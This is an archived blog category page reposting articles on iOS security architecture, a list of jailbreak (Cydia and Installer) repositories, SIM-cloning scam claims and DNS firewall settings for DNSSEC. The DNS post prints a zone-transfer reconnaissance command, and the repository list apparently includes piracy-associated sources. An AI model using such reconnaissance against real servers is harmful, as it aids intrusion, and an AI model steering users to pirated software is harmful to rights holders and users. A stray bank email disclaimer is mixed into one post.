'Hacking'에 해당되는 글 266건

  1. 2012.08.08 Understanding the iOS Security Architecture by CEOinIRVINE
  2. 2012.08.05 Cydia Repositories by CEOinIRVINE 7
  3. 2012.07.04 SIM Card Cloning by CEOinIRVINE 1
  4. 2012.06.15 DNS Vuln. by CEOinIRVINE 1
  5. 2012.06.01 Employers on track to get more nosey with employees' social media lives by CEOinIRVINE 1
  6. 2012.01.28 How to Keep Your AWS Credentials on an EC2 Instance Securely by CEOinIRVINE
  7. 2011.12.10 HttpOnly by CEOinIRVINE
  8. 2011.12.05 Security Advisory by CEOinIRVINE 1
  9. 2011.12.04 Web Penetration Testings by CEOinIRVINE
  10. 2011.11.30 Blocked DOMAINS / IP address for spreading malicous files (Chat.EXE, Chat.DLL) by CEOinIRVINE

Understanding the iOS Security Architecture

You can imagine some of the nasty attacks that await an iOS device; this section discusses how the device is engineered to withstand these kinds of attacks. Here we describe iOS 5, which as you'll see, is pretty secure. In a later section we show you the evolution of how iOS got here, which was a bit of a bumpy ride.

The Reduced Attack Surface

The attack surface is the code that processes attacker-supplied input. If Apple has a vulnerability in some code, and either the attacker can't reach it or Apple doesn't ship the code at all in iOS, an attacker cannot base an exploit on this vulnerability. Therefore, a key practice is minimizing the amount of code an attacker can access, especially remotely.

In the ways that were possible, Apple reduced the attack surface of iOS compared to Mac OS X (or other smartphones). For example, love it or hate it, Java and Flash are unavailable on iOS. These two applications have a history of security vulnerabilities and not including them makes it harder for an attacker to find a flaw to leverage. Likewise, iOS will not process certain files, but Mac OS X will. One example is .psd files. This file type is handled happily in Safari, but not in MobileSafari, and importantly, nobody would likely notice the lack of support for this obscure file format. Likewise, one of Apple's own formats, .mov, is only partially supported, and many .mov files that play on Mac OS X won't play in iOS. Finally, even though iOS renders .pdf files natively, only some features of the file format are parsed. Just to see some numbers on the subject, Charlie Miller once fuzzed Preview (the native Mac OS X PDF viewer) and found well over a hundred crashes. When he tried these same files against iOS, only 7 percent of them caused a problem in iOS. This means that just by reducing the PDF features that iOS handled, it reduced the number of potential vulnerabilities by more than 90 percent in this case. Fewer flaws mean fewer opportunities for exploitation.

The Stripped-Down iOS

Beyond just reducing the potential code an attacker might exploit, Apple also stripped down the number of useful applications an attacker might want to use during and after exploitation. The most obvious example is that there is no shell (/bin/sh) on an iOS device. In Mac OS X exploits, the main goal is to try to execute a shell in “shellcode.” Because there is no shell at all in iOS, some other end goal must be developed for iOS exploits. But even if there were a shell in iOS, it wouldn't be useful because an attacker would not be able to execute other utilities from a shell, such as rm, ls, ps, and so on. Therefore, attackers who get code running will have to either perform all of their actions within the context of the exploited process, or bring along all the tools they want to use. Neither or these options are particularly easy to pull off.

Privilege Separation

iOS separates processes using users, groups, and other traditional UNIX file permission mechanisms. For example, many of the applications to which the user has direct access, such as the web browser, mail client, or third-party apps, run as the user mobile. The most important system processes run as the privileged user root. Other system processes run as other users such as _wireless or _mdnsresponder. By using this model, an attacker who gets full control of a process such as the web browser will be constrained by the fact the code she is executing will be running as user mobile. There are limits to what such an exploit can do; for example, the exploit will not be able to make system-level configuration changes. Likewise, apps from the App Store are limited in what they can do because they will be executed as user mobile as well.

Code Signing

One of the most important security mechanisms in iOS is code signing. All binaries and libraries must be signed by a trusted authority (such as Apple) before the kernel will allow them to be executed. Furthermore, only pages in memory that come from signed sources will be executed. This means apps cannot change their behavior dynamically or upgrade themselves. Together, these actions prevent users from downloading and executing random files from the Internet. All apps must come from the Apple App Store (unless the device is configured to accept other sources). Apple has the ultimate approval and inspects applications before they can be hosted at the App Store. In this way, Apple plays the role of an antivirus for iOS devices. It inspects each app and determines if it is okay to run on iOS devices. This protection makes it very hard to get infected with malware. In fact, only a few instances of malware have ever been found for iOS.

The other impact of code signing is that it complicates exploitation. Once an exploit is executing code in memory, it might want to download, install, and execute additional malicious applications. This will be denied because anything it tries to install will not be signed. Therefore, exploits will be restricted to the process they originally exploit, unless it goes on to attack other features of the device.

This code signing protection is, of course, the reason people jailbreak their phones. Once jailbroken, unsigned applications can be executed on the device. Jailbreaking also turns off other features (more on that later).

Data Execution Prevention

Normally, data execution prevention (DEP) is a mechanism whereas a processor can distinguish which portions of memory are executable code and which portions are data; DEP will not allow the execution of data, only code. This is important because when an exploit is trying to run a payload, it would like to inject the payload into the process and execute it. DEP makes this impossible because the payload is recognized as data and not code. The way attackers normally try to bypass DEP is to use return-oriented programming (ROP), which is discussed in Chapter 8. ROP is a procedure in which the attacker reuses existing valid code snippets, typically in a way never intended by the process, to carry out the desired actions.

The code-signing mechanism in iOS acts like DEP but is even stronger. Typical attacks against DEP-enabled systems use ROP briefly to create a section of memory that is writable and executable (and hence where DEP is not enforced). Then they can write their payload there and execute it. However, code signing requires that no page may be executed unless it originates from code signed by a trusted authority. Therefore, when performing ROP in iOS, it is not possible to turn off DEP like an attacker normally would. Combined with the fact that the exploit cannot execute applications that they may have written to disk, this means that exploits must only perform ROP. They may not execute any other kinds of payloads such as shellcode or other binaries. Writing large payloads in ROP is very time-consuming and complex. This makes exploitation of iOS more difficult than just about any other platform.

Address Space Layout Randomization

As discussed in the previous section, the way attackers try to bypass DEP is to reuse existing code snippets (ROP). However, to do this, they need to know where the code segments they want to reuse are located. Address space layout randomization (ASLR) makes this difficult by randomizing the location of objects in memory. In iOS, the location of the binary, libraries, dynamic linker, stack, and heap memory addresses are all randomized. When systems have both DEP and ASLR, there is no generic way to write an exploit for it. In practice, this usually means an attacker needs two vulnerabilities — one to obtain code execution and one to leak a memory address in order to perform ROP — or the attacker may be able to get by with having only one very special vulnerability.

Sandboxing

The final piece of the iOS defense is sandboxing. Sandboxing allows even finer-grained control over the actions that processes can perform than the UNIX permission system mentioned earlier. For example, both the SMS application and the web browser run as user mobile, but perform very different actions. The SMS application probably doesn't need access to your web browser cookies and the web browser doesn't need access to your text messages. Third-party apps from the App Store shouldn't have access to either of these things. Sandboxing solves this problem by allowing Apple to specify exactly what permissions are necessary for apps. (See Chapter 5 for more details.)

Sandboxing has two effects. First, it limits the damage malware can do to the device. If you imagine a piece of malware being able to get through the App Store review process and being downloaded and executed on a device, the app will still be limited by the sandbox rules. It may be able to steal all your photos and your address book, but it won't be able to send text messages or make phone calls, which might directly cost you money. Sandboxing also makes exploitation harder. If an attacker finds a vulnerability in the reduced attack surface, manages to get code executing despite the ASLR and DEP, and writes a productive payload entirely in ROP, the payload will still be confined to what is accessible within the sandbox. Together, all of these protections make malware and exploitation difficult, although not impossible.

 


This message w/attachments (message) is intended solely for the use of the intended recipient(s) and may contain information that is privileged, confidential or proprietary. If you are not an intended recipient, please notify the sender, and then please delete and destroy all copies and attachments, and be advised that any review or dissemination of, or the taking of any action in reliance on, the information contained in or attached to this message is prohibited.
Unless specifically indicated, this message is not an offer to sell or a solicitation of any investment products or other financial product or service, an official confirmation of any transaction, or an official statement of Sender. Subject to applicable law, Sender may intercept, monitor, review and retain e-communications (EC) traveling through its networks/systems and may produce any such EC to regulators, law enforcement, in litigation and as required by law.
The laws of the country of each sender/recipient may impact the handling of EC, and EC may be archived, supervised and produced in countries other than the country in which you are located. This message cannot be guaranteed to be secure or free of errors or viruses.

References to "Sender" are references to any subsidiary of Bank of America Corporation. Securities and Insurance Products: * Are Not FDIC Insured * Are Not Bank Guaranteed * May Lose Value * Are Not a Bank Deposit * Are Not a Condition to Any Banking Service or Activity * Are Not Insured by Any Federal Government Agency. Attachments that are part of this EC may have additional important disclosures and disclaimers, which you should read. This message is subject to terms available at the following link:
http://www.bankofamerica.com/emaildisclaimer. By messaging with Sender you consent to the foregoing.

'Hacking' 카테고리의 다른 글

HTML5 Security & Mobile  (0) 2012.09.25
Burp Suite Tutorial – The Intruder Tool  (7) 2012.08.10
Cydia Repositories  (7) 2012.08.05
SIM Card Cloning  (1) 2012.07.04
DNS Vuln.  (1) 2012.06.15
Posted by CEOinIRVINE
l

Cydia Repositories

Hacking 2012. 8. 5. 03:50

Welcome to iJailbreak’s Cydia Repositories section. In this section you will find the best Cydia repositories/sources and the best Installer 4.0/3.0 repositories/sources that are compatible with iPhone, iPod Touch and iPad. Simply scroll through our Cydia Repositories section and find a variety of sources that you never knew about. Additionally, if you know a great Cydia repository that is not on our list let us know and we will add it.

Note #1: We will be updating this page with the latest Cydia and Installer repositories when new repositories are released, so make sure you come back soon!



How To: Manually Delete Broken Sources From Cydia
How To: Install Icy Installer On iPhone, iPod Touch, iPad [iOS4 Compatible]
The Ultimate Tutorial For Creating A Cydia Repository [Covering Everything A-Z]
Rock App Vs Cydia: Which Of These Two Installers Are Truly Better?
SaurikIT Acquires Rock Your Phone Inc

FilippoBiga Repo • http://filippobiga.me/repo/
Ryan Petrich • http://reptri.ch/repo (This repository contains beta software and is for testing purposes only!)
BigBoss & Planet-iPhones • http://apt.bigboss.us.com/repofiles/cydia/
ZodTTD • http://www.zodttd.com/repo/cydia/
iJailbreak.com • http://www.ijailbreak.com/repository/
Zodttd & MacCiti • http://cydia.zodttd.com/repo/cydia/ (Themes, emulators, ringtones and more)
Hackulo.us • http://cydia.hackulo.us
xSellize • http://cydia.xsellize.com
SiNfuL iPhone • http://www.sinfuliphonerepo.com
Epelle6 • http://elpelle6.com/repo
Hack&Dev.org • http://iphone.hackndev.org/apt/
SaladSoft • http://nickplee.com/cydiasource/
Ste Packaging • http://repo.smxy.org/cydia/apt/
Steffwiz • http://apt.steffwiz.com/
Telesphoreo Tangelo • http://apt.saurik.com/
iClarified • http://cydia.iclarified.com/
iSpazio • http://ispaziorepo.com/cydia/apt
Free Coder • http://iphone.freecoder.org/apt/
Intelliborn • http://intelliborn.com/cydiav/
iPhone Video Recorder • http://www.iphonevideorecorder.com
iFon Norway • http://c.iFon1.no
ModMyiFone • http://apt.modmyi.com/
Weiphone Source • http://app.weiphone.com/cydia/
urbanfanatics.com • http://urbanfanatics.com/cydia/
WeHo • http://weho.ru/iphone/
iAcces • http://www.iacces.com/apt/
Vwallpapers • http://i.danstaface.net/deb/
iphone.org.hk • http://www.iphone.org.hk/apt/
XSellize • http://xsellize.com/cydia/
XSellize VIP • http://xsellize.com/cydia/usuario-password
Niklas Schroder • http://apt.paperclipsandscrambledeggs.com
lHackers.nl • http://apt.hackers.nl/
RichCreations • http://www.richcreations.com/iphone/apt/
Zuijlen • http://zuijlen.eu
Bloc Apple en Catalá • http://apple.blocks.cat/repo/
comcute&gecko; • http://gecko.pri.ee/cydia/
iFoneguide.nl • http://cydia.ifoneguide.nl/
iPhones-notes.de Repo • http://apt.iphone-storage.de/
iPhone-patch • http://mspasov.com/
iphonehe.com • http://iphonehe.com/iphone/
iphoneIslam • http://apps.iphoneislam.com/
iPhonemmod.br • http://cydia.iphonemod.com.br/
iPuhelin.com • http://ipuhelin.com/cydia/
i-Apps • http://cydia.i-apps.pl/
SOS iPhone • http://cy.sosiphone.com/
Macbury • http://macbury.jogger.pl/files/
MyApple • http://cydia.myapple.pl/
CZ&SK; • http://csid.tym.cz/repo/
yellowsn0w • http://apt9.yellowsn0w.com/
IngiliZanahtari • http://apt.ingilizanahtari.com/
iPhone-patch (Bulgarian) • http://mc2.iphoneall.org/
4PP13 Team Repository • http://apt.123locker.com
iPhone.ir Repo • http://ir-iphone.ir/cydia/
iRom gba/Apps • http://iromrepo.com/Cydia/gba/
iRom Genesis Roms • http://iromrepo.com/Cydia/genesis/
iRom SNES Roms • http://iromrepo.com/Cydia/snes
Howett • http://howett.net/cydia
Clubiphone • http://www.clubifone.org/repo
iBlueToothProject • http://ibluetoothproject.com/cydia
iSoftRu • http://isoftru.ru/repo/
David Ashman • http://david.ashman.com/apt/
A-steroids • http://a-esteroids.com/cydia/
AppleNewsFR • http://apple-news.fr/repo/
TouchMania • http://cydia.touch-mania.com/
EasyWakeup • http://easywakeup.net/rep/
hkvls.dyndns.com • http://hkvls.dyndns.com/downloads/debian
Sleepers • http://repo.sleepers.com/cydia
Ranbee • http://ranbee.com/repo/
PwnCenter • http://apt.pwncenter.com/
Redwolfberry • http://redwolfberry.com/rupertgee/cydia/
Darvens Repository • http://apt.guardiansofchaos.com/

Installer 4.0 Repositories (The New Cydia Alternative – Installer 4.0! [Back From The Dead])

RiP Dev • http://i.ripdev.com/
SOS iPhone French Repository • http://i.sosiphone.com/
Ste Packaging • http://repo.smxy.org/installer4/
ZeFiR’s rep • http://www.zefir.kiev.ua/repo/
JASON-HK.COM___2.0 • http://www.jason-hk.com/rep/
Srt10coupe’s repository • http://i.srt10coupe.de/
A27 Dev • http://www.a27dev.com/installer/repo
AboutTheiPhone • http://www.makkiaweb.net/openrepo/abouttheiphone/
Apdyg • http://www.apdyg.com/repo/
BigBoss’s Apps and Things • http://www.apptapp.thebigboss.org/repofiles/installer4/
BigBoss’s Apps and Things • http://www.iphonebigboss5.com/repo/repof…nstaller4/
Chamber Labs Repsitory • http://www.chamber.ee/repo/
Code Genocide Repo • http://repo.codegenocide.com/
Danimator’s Repo • http://www.danimator.techdocrx.com/Repository/
DelphiKnight’s Repository • http://www.iphone.appstore.ge/
Elite Members Repo • http://www.teamifortner.com/installer/
Fishbone’s Repo • http://www.fishbone.site90.com/
HDNL Repository • http://www.hackers.nl/repo4/
HHVN – iPhone • http://iphone.handheld.com.vn/installer/
Hiphonepro.com Repo • http://www.hiphonerepo.com/repo/
Intelliborn • http://www.intelliborn.com/repo/
LoQueBARTnoEscribe • http://www.multifiesta.com.uy/i/
iRom Apps/GBA • http://www.iromrepo.com/Repo/GBA/
iRom GENESIS • http://www.iromrepo.com/Repo/GENESIS/
iRom SNES • http://www.iromrepo.com/Repo/SNES/
iSpazioinstaller.ispazio.net/
iSpazio • http://repo.neolinus.org/ispazio/
iXtension • http://www.ixtension.com/repo/
navco786 • http://www.navco786.com/repo/
M2 Local Repo • http://m2.iphoneall.org/
MacOS Movil • http://www.repo.macosmovil.com/
MacOS Movil • http://www.bealze.com/repo/
ModElit3ge • http://www.elit3ge.info/repo/
ModMyiFone.com • http://i.modmyi.com/
ModMyiFone • http://www.modmyi.com/i/
ModMyiFone • http://www.modmyiphone.com/i/
ModMyiFone • http://www.modmyifone.com/i/
Moroko VoIP Repo • http://mobile.moroko.ru/iphone/
Ocho Repo • http://www.nextphasesolutions.com/iphone/
gPDA.ru • http://www.gpda.ru/r/
hackint0sh.org installer repo • http://hackint0sh.org/repo/
i4repo.com • http://www.i4repo.com/
iAcces Community • http://www.iacces.com/repo4/
iClaified • http://www.iclarified.com/installer4/
iFon Norway • http://www.ifon1.no/installer4/instructions.php (http://i.ifon1.no)
iFoneTec Repository • http://app.mivtones.com
iFoneTec Repository • http://repo.ifonetec.com/
iFoneTec(VIP) Repository • http://vip.mivtones.com/
iFoneguide • http://www.ifoneguide.nl/repo/
iModZone Repo • http://imodzone.extroverthost.com/repo/
iModZone Repo • http://i.imodzone.net/
iPhone-notes.de • http://i.iphone-storage.de/
iPhoneBlog.co.il Repository • http://rep.hacxip.com/

Installer 3.0 Repositories

BigBoss’s Apps and Things • sleepers.net/iphonerepo
iSpazio • http://repo.ispazio.net
ModMyiFone.com • modmyifone.com/installer.xml
RiP Dev (Kate, formerly Caterpillar) • http://repository.ripdev.com/
Ste Packaging • http://repo.smxy.org/iphone-apps/
CopyCoders • homepage.mac.com/hartsteins/copycoders/copycoders.xml
dajavax • dajavax.googlepages.com/repo.xml
aka.Repository • akamatsu.org/repo.xml
AlliPodHax Source • ihacks.us/index.xml or allipodhax.3host.biz/index.xml
Skrew • i.danstaface.net
Slezak’s Stuff • http://www.spencerslezak.com
Smart-Mobil • http://www.smart-mobile.com/beta
Soneso Repository • soneso.com/iphone
SOS iPhone (ContactFlow) • rep.sosiphone.com
Spiffyware • spiffyware.net/iphone
Studded • studded.net/installer/index.xml
Surge • iphonesurge.com/iphonesurge.xml
Swell • lyndellwiggins.com/installer/Swell
Swirlyspace • swirlyspace.com/SwirlySpace.xml
AlohaSoft 1.0.2 • homepage.mac.com/reinholdpenner/102.xml
AlohaSoft 1.1.1 • homepage.mac.com/reinholdpenner/111.xml
AlohaSoft 1.1.2 • homepage.mac.com/reinholdpenner/112.xml
Apple • applerepo.com
Apple Daily Times • http://www.appledailytimes.com/installer
AppTapp • repository.apptapp.com
Apogee LTD • apogeeltd.com
Blaze • blazecompany.googlepages.com/
BigBoss Beta • sleepers.net/iphonerepobeta
BlackWolf • m8an.de/ownrisk.xml (Extended Preferences)
Byooi Digicide • byooi.com/iphone/digicide.plist (Jiggy Apps)
CedSoft (iSnake/Bounce) • prog.cedsoft.free.fr
Chris Miles Repository (iSolitare) • iphone.rustyredwagon.com/repo
Conceited Software Beta • http://conceitedsoftware.com/iphone/beta/
Conceited Software • http://www.macminicolo.net/conceited/iphone/cache.plist
databinge • repo.databinge.com
DavTeam • davteam.com/repo.xml
Death to Design • iphone.deathtodesign.com
Digital Agua • repo.digitalagua.com
Dlubbat’s Apps • http://www.dlubbat.com/iphone.xml
Ettore Software Ltd • ettoresoftware.com/iphone/beta/ty.iphone
Fight Club • dezign999.com/repo
FreeMyiPhone • pxl.freemyiphone.com/
Fring • fring.com/iphone.xml
Gogosoft Source • http://www.blackblack.org/gogobeta.plist
GravyTrain ’s Vault • iiispace.com/installer2.xml (Includes user submitted themes)
Hijinks Inc. • hijinksinc.com/i/installer.xml
hitoriblog Experimental Pack • hpcgi3.nifty.com/moyashi/ipodtouch/repository.cgi
HighTymes • hightymes.org/iphone/plist/index.xml
iApp-a-Day • iappaday.com/install
Imagine09 • home.twcny.rr.com/imagine09/Imagine09.xml
iBlackjack • iphonefanclub.com/native
iClarified • installer.iclarified.com
iFoneTech • app.ifonetec.com
Intelliborn • intelliborn.com/repo
iPhone Cake • iphonecake.com/src/all
iPhoneDevDocs • idevdocs.com/install
iPhone For Taiwan (SummberBoard Themes) • iphone4.tw/showme
iPhoneFreakz • iphonefreakz.com/repo.xml
iPhoneIslam • apps.iphoneislam.com
iPlayful • iplayful.com/r
i.Marine Software (Caissa) • caissa.us
imimux Repository (Real Artist) • imimux.com
iPod Touch Fans • http://www.touchrepo.com/repo.xml
iPod Touched • ipodtouched.net/repo.xml
iPod-Touch-Themes.de • http://www.ipod-touch-themes.de/installer/repo.xml
iSwitcher (old) • web.mac.com/iswitcher2/list.xml
iSwitcher (new) = MeachWare • meachware.com/list.xml
Jeremie Engel • rep.visuaweb.com
Jiggy Main Repository (Jiggy) • jiggyapp.com/i
lazyasada • lazyasada.xeterdesign.com/repo.xml
Limited Edition iPhone • limitededitioniphone.com/lei.xml
Loring Studios • loringstudios.com/iPhone-schnapps/index.xml
McAfeeMobile Dev Repository • ipkg.mcafeemobile.com
MarcoGiorgini.com • marcogiorgini.com/iPhone/plist.xml
Makayama Software (CameraPro) • tinyurl.com/2t8cax
MaomaLand • maomaland.com/iphone/repo.xml
Mateo (BeatPhone) • bblk.net/iphone
McCarron’s Repo • patrickmccarron.com/irepo
MeachWare (new iSwitcher) • http://www.meachware.com/list.xml
Mkv iPhone Repository • repo.mkv.mobi
Mobile Stacks • mobilestack.googlecode.com/svn/repository/internal.plist
ModMyApple.it (iBirthday) • http://www.serverasp.net/chiafa/MMA/repo.xml
Moyashi • hpcgi3.nifty.com/moyashi/ipodtouch/repository.cgi
MTL Repository • home.mike.tl/iphone
MyApple.pl • i.myapple.pl
newATTiPhone.com  • newattiphone.com/repo.xml
NPike.net • http://apps.npike.net/repo.xml
Nuclear Design  • nucleardesign.net/repository
Planet-iPhones • planet-iphones.com/repository
Polar Bear Farm • http://www.polarbearfarm.com/repo/
Polleo Limited • source.polleo.no
Private Indisture • brandonsgames.com/chriss/index.xml
Pyrofer’s Projects • pyrofersprojects.com/repos/repos.xml
R4m0n (iPhysics) • iphone.r4m0n.net/repos
Robota Softwarehouse • iphone.robota.nl
Sanoodi Repository • sanoodi.com/iphone
ScoresPro • http://www.scorespro.com/iphone/repo.xml
scummVM • urbanfanatics.com/scummvm.xml
sendowski.de (MobileChat) • sendowski.de/iphone
Shai’s Apps • ride4.org/shai.xml
Simek’s Graphic • simek.ddl2.pl
sipgate repository • iphone.sipgate.com
Touchmod Team • touchmods.net/rep.xml
Trejan • trejan.com/irepo
Trivialware • mazinger.cs.yale.edu/iphone-apps/index.xml
Unlock.no • i.unlock.no
weiPhone (weTools/weDict) • app.weiphone.com/installer
Wiki2Touch • 168weedon.com/i/
Wizdom on Wheels (Common Website Links) • iphoneapps.wizdomonwheels.com
XK72 Repository • http://xk72.com/iphone/repos/
ZodTTD • zodttd.com/repo


 

'Hacking' 카테고리의 다른 글

Burp Suite Tutorial – The Intruder Tool  (7) 2012.08.10
Understanding the iOS Security Architecture  (0) 2012.08.08
SIM Card Cloning  (1) 2012.07.04
DNS Vuln.  (1) 2012.06.15
Employers on track to get more nosey with employees' social media lives  (1) 2012.06.01
Posted by CEOinIRVINE
l

SIM Card Cloning

Hacking 2012. 7. 4. 13:23

LUCKNOW: Next time if you get a missed call starting with +92; #90 or #09, don't show the courtesy of calling back. BSNL has issued alerts to subscribers — particularly about the series mentioned above — saying that calling the number back after a missed call may make a user susceptible to SIM card cloning. There is, however, confusion over this claim made by some BSNL and intelligence officials. Cloning a SIM card requires physical access to it or the interception of the communication between the caller and his or her cellphone operator's network.

It is said that one lakh subscribers have fallen prey to this scam. Intelligence agencies too are said to have confirmed to the service providers particularly in the UP West telecom division that such a racket is going on and the menace is growing fast. "We are sure there must be some more similar combinations that the miscreants are using to clone the handsets, including SIM, and all the information stored in them," an intelligence officer told TOI. (This claim made by this intelligence official seems implausible, or nearly impossible.)

General manager of BSNL, RV Verma, said the department had already issued alerts to all the broadband subscribers and now alerts were being SMSed to other subscribers as well.

Anyone can clone a SIM card by using a hardware tool that can read and copy information from it. But wirelessly or remotely intercepting information contained within the SIM, though theoretically possible, is considered extremely difficult. It may require hacking into the telecom operator's network or using very expensive tools. An article on eHow, a website that explains how users can performs various tasks using several gadgets, says that the SIM can be cloned using a cheap hardware tool that can extract the authentication key from one SIM and copy it to another. But it doesn't mention any method that can make use of missed calls to clone a SIM.

"It usually starts with a missed call from a number starting with +92. In case the subscriber takes the call before it is dropped as a missed call then the caller on the other end poses as a call center executive checking the connectivity. The caller then asks the subscriber to press # 09 or # 90 call back on his number to establish that the connectivity to the subscriber was seamless," says a victim who reported the matter to the BSNL office at Moradabad last week. "The moment I redialled the caller number, my account balance lost a sum of money. Thereafter, in the three days that followed every time I got my cell phone recharged, the balance would be reduced to single digits within the next few minutes," she told the BSNL officials.

Posted by CEOinIRVINE
l

DNS Vuln.

Hacking 2012. 6. 15. 01:53

Allow Both TCP and UDP Port 53 to Your DNS Servers

DNS queries are getting bigger so we do not want to accidentally block them

By Scott Hogg on Sun, 08/22/10 - 7:44pm.

Security practitioners for decades have advised people to limit DNS queries against their DNS servers to only use UDP port 53. The reality is that DNS queries can also use TCP port 53 if UDP port 53 is not accepted. Now with the impending deployment of DNSSEC and the eventual addition of IPv6 we will need to allow our firewalls for forward both TCP and UDP port 53 packets.

DNS can be used by attackers as one of their reconnaissance techniques. Public information contained a target's servers is valuable to an attacker and helps them focus their attacks. Attackers can use a variety of techniques to retrieve DNS information through queries. However, hackers often try to perform a zone transfer from your authoritative DNS servers to gain access to even more information. You can use the dig command to gather information from a server for a specific zone file.
dig @192.168.11.24 example.org -t AXFR

Zone transfers take place over TCP port 53 and in order to prevent our DNS servers from divulging critical information to attackers, TCP port 53 is typically blocked. If the organization's firewall protecting the authoritative DNS server allowed the TCP port 53 packets and the DNS server was configured to allow zone transfers to anyone, then this dig command would be successful. However, most organizations have configured their DNS servers to prevent zone transfers from unintended DNS servers. This can be configured in the BIND zone file using any one of these forms of the allow-transfer command as shown below.
allow-transfer {"none";};
allow-transfer { address_match_list };
allow-transfer {192.168.11.11;};

Furthermore, most organizations have also used firewalls to block TCP port 53 to and from their DNS servers and the Internet. This is double-protection in case the DNS server accidentally allowed transfers.

Configuring your DNS servers to permit zone transfers to only legitimate DNS servers has always been and continues to be a best practice. However, the practice of denying TCP port 53 to and from DNS servers is starting to cause some problems. There are two good reasons that we would want to allow both TCP and UDP port 53 connections to our DNS servers. One is DNSSEC and the second is IPv6.

DNSSEC Creates Larger DNS Responses
I love reading The IP Journal and have read it since the first issue in 1998.

In the recent edition of the IP Journal there was an article by a friend of mine, Stephan Lagerholm, of Secure64 and the Texas IPv6 Task Force, titled "Operational Challenges When Implementing DNSSEC". This article covered many of the caveats that organizations run into as they move to deploy DNSSEC.
One of the key issues mentioned is that DNSSEC can cause DNS replies to be larger than 512 bytes. DNSSEC (Defined in RFC 4033, RFC 4034, and RFC 4035) requires the ability to transmit larger DNS messages because of the extra key information contained in the query responses. TCP port 53 can be used in the cases where the DNS responses greater than 512 bytes. However, using UDP messages are preferable to using TCP for large DNS messages is due to the fact that TCP connections can consume computing resources for each connection. DNS servers get numerous connections per second and using TCP can add too much overhead. To address this issue, the IETF RFC 2671 "Extension Mechanisms for DNS (EDNS0)" defines a method to extend the UDP buffer size to 4096 bytes to allow for DNSSEC and larger query responses. To enable EDNS0 on your BIND 9 configuration you can use the following BIND operations statement
edns-udp-size 4096 ;

Awareness of DNSSEC has increased due to the vulnerabilities disclosed 2 years ago and with recent news about the U.S government striving to implement it. Many organizations have been planning their DNSSEC deployments. DNSSEC is becoming more widely deployed now that key Top Level Domains (TLDs) are being signed. The TLD .org has now been signed. The Internet's root zone was signed just 2 months ago in a ceremony in Virginia. VeriSign has stated their desire to support DNSSEC for .com and .net by 2011. Comcast has created a DNSSEC Information Center site that can help you keep up to date on the latest DNSSEC status.

So as the world transitions to DNSSEC, your organization may not necessarily be using it yourself for your own authoritative DNS servers. However, your name servers may be requesting DNSSEC information even though it is not configured to serve up DNSSEC records. You may encounter problems if your resolvers are starting to encounter DNSSEC information and only able to receive UDP packets of 512 bytes or smaller. If your firewall is blocking TCP port 53 DNS messages or UDP port 53 messages using EDNS0, then you may encounter problems even if you haven't deployed DNSSEC yourself.

IPv6 DNS Lookups May be Larger Than 512 Bytes
We all know that IPv6 addresses are four times larger than IPv4 addresses. A standard A-record query response easily fits within the 512 byte UDP limit and so does a standard AAAA-record query response. A standard AAAA-record query response is about 100 bytes. However, it is conceivable that with CNAMEs, glue records, and other data that may accompany a DNS response that it could exceed the UDP 512 byte limit. Therefore, allowing TCP port 53 or enabling EDNS0 is also a requirement for IPv6 communications. This is also the case if you are doing DNS queries for IPv6 names and addresses using the IPv4 protocol to communicate with the DNS servers.

One advantage of using IPv6 is that the vast majority of systems will use aggregatable global unicast addresses. Therefore, there will not be any needs for NAT. DNSSEC has not been compatible with NAT so IPv6 offers an opportunity to use DNSSEC as it was intended to be used. One of the transition mechanisms originally developed was Network Address Translation - Protocol Translation (NAT-PT) (RFC 2766). This technique offered a rudimentary method to translate IPv4 and IPv6 packets between IPv4-only hosts and IPv6-only hosts. However, there were many reasons why NAT-PT was deprecated (RFC 4966) in the summer of 2007. One of those reasons to deprecate NAT-PT was the fact that it broke the usage of DNSSEC.

Firewalls
If a UDP port 53 response is larger than 512 bytes then it may be truncated or then DNS falls back to using TCP. However, if TCP is blocked on the firewall then the lookup can fail altogether. Your firewall may also be preventing you from using EDNS0. Therefore, you should configure your firewall to allow both TCP and UDP port 53 to and from your DNS servers as well as allow your firewall to pass larger EDNS0 packets. To accomplish this change you will have to modify your firewall's configuration parameters to enable EDNS0.

Cisco publishes a nice guide on DNS best practices that includes how to secure your DNS server configurations as well as allow for DNSSEC communications.

If you have a Cisco PIX firewall (6.3 and earlier) you may need to add this command to your configuration.
fixup protocol dns maximum-length 4096
This command will increase the firewall's DNS message length limit and allow EDNS0 messages to be forwarded.

If you have a newer software version running on your PIX or ASA then the traffic policy commands will look like this.
policy-map type inspect dns preset_dns_map
parameters
dns-guard
id-randomization
message-length maximum 4096
id-mismatch count 10 duration 2 action log
exit
match header-flag RD
drop
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
service-policy global_policy global

In order to increase the response length you need to enter these commands:
policy-map global_policy
class inspection_default
inspect dns maximum-length 4096

To view the settings use the following command:
show service-policy inspect dns

Juniper ScreenOS also allows for the increase in DNS message size using the following command.
set di service dns udp_message_limit 512 - 4096

If your firewall doesn't have a visible setting to enable EDNS0 then you may want to check with the firewall manufacturer to see if it can even support this setting. If you are concerned about how your home router/firewall may fare with the introduction of DNSSEC you can check out the test results from Nominet and Core Competence.

Testing
Once you have permitted TCP and UDP port 53 and believe that your systems are EDNS0-capable, then you must test that it is working as expected. There are several methods that you can use to test your configuration and validate if your systems are capable of handling larger DNS packets.
Domain Name System Operations Analysis and Research Center (OARC) provides tools for testing your reply size limits.

They offer a Validating Resolver.
You can use the dig utility to test your configuration.
dig +nodnssec +norec +ignore ns . @L.ROOT-SERVERS.NET
dig +dnssec +norec +ignore ns . @L.ROOT-SERVERS.NET
dig +dnssec +norec +vc any . @L.ROOT-SERVERS.NET

You can also use dig to test against the OARC DNS servers.
dig @208.67.222.222 +short rs.dns-oarc.net txt
dig @158.43.128.1 +short rs.dns-oarc.net txt

RIPE NCC also provides a method for testing your DNS query reply size. RIPE also offers a Java reply size test utility that you may find useful.

When you are testing DNS it is often helpful to have a protocol analyzer running so that you can inspect the queries and the responses. If you are using Wireshark then you can set a display filter for your captured traffic to only look at the DNS packets. This filter will look something like this.
tcp.port == 53 || udp.port == 53

You also need to check that DNS servers on the Internet can receive larger TCP DNS responses from your servers. Eventually, your DNS servers will use DNSSEC and you want those DNS resolvers in other organizations to be able to get all your DNSSEC information. Therefore, you must test your UDP and TCP port 53 traffic in both directions.

Other Issues
